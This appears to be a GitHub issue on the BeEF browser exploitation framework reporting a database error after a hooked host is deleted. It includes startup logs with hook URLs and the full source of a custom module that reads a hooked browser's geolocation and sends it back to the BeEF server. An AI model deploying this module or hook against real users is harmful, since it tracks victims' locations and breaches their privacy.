beefproject/beef

Error: Could not find a command with id in a specific context (Own module)

jme418 opened this issue · 1 comments

First Steps

BeEF Version: 0.5.4.0
Ruby Version: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
Browser Details (e.g. Chrome v81.0): Causing problems with all I've tried (FF - 115.8.0esr, O - 108.0.5067.29, C - 123.0.6312.86, 123.0.6312.58, 121.0.6167.178)
Operating System: Linux, Windows and Android

Configuration

  1. Have you made any changes to your BeEF configuration? Yes.
  2. Have you enabled or disabled any BeEF extensions? Yes, Metasploit one but I do not remember if anyone else, I've been using BeEF for a while.

Failure Condition

Deletion of the infected host after executing the module on it from the command tab in a session with the database not clean.

Error

msf6 > sudo ./beef
[*] exec: sudo ./beef                                                                                                                                                                        
                                                                                                                                                                                             
[23:25:13][*] Browser Exploitation Framework (BeEF) 0.5.4.0                                                                                                                                  
[23:25:13]    |   Twit: @beefproject                                                                                                                                                          
[23:25:13]    |   Site: https://beefproject.com                                                                                                                                              
[23:25:13]    |_  Wiki: https://github.com/beefproject/beef/wiki                                                                                                                              
[23:25:13][*] Project Creator: Wade Alcorn (@WadeAlcorn)                                                                                                                                      
[23:25:13][*] Connecting to Metasploit on 127.0.0.1:55552                                                                                                                                    
[23:25:13][*] [Metasploit] Successful connection with Metasploit.                                                                                                                            
[23:25:14][*] Loaded 312 Metasploit exploits.                                                                                                                                                
[23:25:14][*] BeEF is loading. Wait a few seconds...                                                                                                                                          
[23:25:18][*] 9 extensions enabled:                                                                                                                                                          
[23:25:18]    |   XSSRays                                                                                                                                                                    
[23:25:18]    |   WebRTC                                                                                                                                                                      
[23:25:18]    |   Social Engineering                                                                                                                                                          
[23:25:18]    |   Requester                                                                                                                                                                  
[23:25:18]    |   Proxy                                                                                                                                                                      
[23:25:18]    |   Network                                                                                                                                                                    
[23:25:18]    |   Metasploit                                                                                                                                                                  
[23:25:18]    |   Events                                                                                                                                                                      
[23:25:18]    |_  Admin UI                                                                                                                                                                    
[23:25:18][*] 617 modules enabled.                                                                                                                                                            
[23:25:18][*] 2 network interfaces were detected.                                                                                                                                            
[23:25:18][*] running on network interface: 127.0.0.1                                                                                                                                        
[23:25:18]    |   Hook URL: http://127.0.0.1:3000/hook.js                                                                                                                                    
[23:25:18]    |_  UI URL:   http://127.0.0.1:3000/ui/panel                                                                                                                                    
[23:25:18][*] running on network interface: 192.168.68.105
[23:25:18]    |   Hook URL: http://192.168.68.105:3000/hook.js
[23:25:18]    |_  UI URL:   http://192.168.68.105:3000/ui/panel
[23:25:18][*] Public:
[23:25:18]    |   Hook URL: https://xxxxxxxxxx.ngrok-free.app:443/hook.js
[23:25:18]    |_  UI URL:   https://xxxxxxxxxx.ngrok-free.app:443/ui/panel
[23:25:18][*] RESTful API key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[23:25:18][*] HTTP Proxy: http://127.0.0.1:6789
[23:25:18][*] [ARE] Skipping ruleset (Fingerprint Browser): Duplicate rule already exists in the database (ID: 1)
[23:25:18][*] [ARE] Skipping ruleset (Get Geolocation HTML5 (jking)): Duplicate rule already exists in the database (ID: 2)
[23:25:18][*] BeEF server started (press control+c to stop)
[23:25:49][*] Hooked browser [id:8, ip:xxx.xxx.xxx.xxx] has executed instructions (status: SUCCESS) from command module [cid:19, mod: 289, name:'Get Geolocation HTML5 (jking)']

...

[23:26:01][!] Error handling HTTP request: Couldn't find BeEF::Core::Models::Command with 'id'=19
[23:26:01][!] ["/var/lib/gems/3.1.0/gems/activerecord-7.1.3/lib/active_record/core.rb:253:in `find'", "/home/jking/Applications/beef/extensions/admin_ui/controllers/modules/modules.rb:500:in `select_command_results'", "/home/jking/Applications/beef/extensions/admin_ui/classes/httpcontroller.rb:97:in `call'", "/home/jking/Applications/beef/extensions/admin_ui/classes/httpcontroller.rb:97:in `run'", "/home/jking/Applications/beef/extensions/admin_ui/handlers/ui.rb:27:in `call'", "/var/lib/gems/3.1.0/gems/rack-2.2.8/lib/rack/urlmap.rb:74:in `block in call'", "/var/lib/gems/3.1.0/gems/rack-2.2.8/lib/rack/urlmap.rb:58:in `each'", "/var/lib/gems/3.1.0/gems/rack-2.2.8/lib/rack/urlmap.rb:58:in `call'", "/var/lib/gems/3.1.0/gems/thin-1.8.2/lib/thin/connection.rb:86:in `block in pre_process'", "/var/lib/gems/3.1.0/gems/thin-1.8.2/lib/thin/connection.rb:84:in `catch'", "/var/lib/gems/3.1.0/gems/thin-1.8.2/lib/thin/connection.rb:84:in `pre_process'", "/var/lib/gems/3.1.0/gems/thin-1.8.2/lib/thin/connection.rb:53:in `process'", "/var/lib/gems/3.1.0/gems/thin-1.8.2/lib/thin/connection.rb:39:in `receive_data'", "/var/lib/gems/3.1.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run_machine'", "/var/lib/gems/3.1.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run'", "/var/lib/gems/3.1.0/gems/thin-1.8.2/lib/thin/backends/base.rb:75:in `start'", "/var/lib/gems/3.1.0/gems/thin-1.8.2/lib/thin/server.rb:162:in `start'", "/home/jking/Applications/beef/core/main/server.rb:156:in `start'", "./beef:279:in `<main>'"]

Module files

command.js

// Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
    if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(function(position) {
            var coordinates = "(latitude: " +  position.coords.latitude + ", longitude" + position.coords.longitude + ")";
            var mod_data = 'coordinates=' + coordinates;
            beef.net.send("<%= @command_url %>", <%= @command_id %>, mod_data, beef.are.status_success());
            return [beef.are.status_success(), mod_data];
        }, function(error) {
            var errorMessage = "Geolocation permission denied";
            var mod_data = 'coordinates=' + errorMessage;
            beef.net.send("<%= @command_url %>", <%= @command_id %>, mod_data);
            return [beef.are.status_success(), mod_data];
        });
    } else {
        var errorMessage = "Geolocation not supported by this browser";
        var mod_data = 'coordinates=' + errorMessage;
        beef.net.send("<%= @command_url %>", <%= @command_id %>, mod_data);
        return [beef.are.status_success(), mod_data];
    }
});

config.yaml

#
# Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
    module:
        get_geolocation_html5_jking:
            enable: true
            category: "Browser"
            name: "Get Geolocation HTML5 (jking)"
            description: "This module is based on a typical HTML5 geolocation request. By granting permission, it retrieves and reveals the exact real position of the user."
            authors: ["jking"]
            target:
                working: ['ALL']
                user_notify: ['ALL']

module.rb

#
# Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Get_geolocation_html5_jking < BeEF::Core::Command
  def post_execute
    content = {}
    content['coordinates'] = @datastore['coordinates']
    save content
  end
end

This issue as been marked as stale due to inactivity and will be closed in 7 days